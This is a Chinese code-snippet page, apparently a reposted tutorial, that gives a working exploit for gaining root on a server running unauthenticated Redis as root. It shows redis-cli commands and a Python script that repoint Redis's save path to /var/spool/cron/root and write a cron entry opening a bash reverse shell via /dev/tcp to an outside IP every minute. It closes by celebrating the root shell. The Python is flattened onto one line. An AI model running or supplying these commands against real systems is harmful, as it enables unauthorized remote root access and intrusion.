首页 > 代码库 > redis写定时任务获取root权限
redis写定时任务获取root权限
前提:
1.redis由root用户启动。
2.开启cron的时候,/var/spool/cron linux机器下默认的计划任务,linux会定时去执行里面的任务。
启动服务 :/sbin/service crond start 或 /etc/init.d/crond start(centos系列) sudo /etc/init.d/cron start (ubuntu系列)
一.windows下
config set dir /var/spool/cron
config set dbfilename root
set 1 "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"
save
二.linux下
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"|redis-cli -h 192.168.118.129 -x set 1
redis-cli -h 192.168.118.129 config set dir /var/spool/cron/
redis-cli -h 192.168.118.129 config set dbfilename root
redis-cli -h 192.168.118.129 save
三.再贴一段python代码
import redisdef shell_exploit(): try: r =redis.StrictRedis(host=‘192.168.118.129‘,port=6379,db=0,socket_timeout=10) r.set(1, ‘\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/your_ip/3333 0>&1\n\n‘) r.config_set(‘dir‘,‘/var/spool/cron‘) r.config_set(‘dbfilename‘,‘root‘) r.save() print "success!" except: print "fail!" passshell_exploit()
反弹成功,root权限!
redis写定时任务获取root权限
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。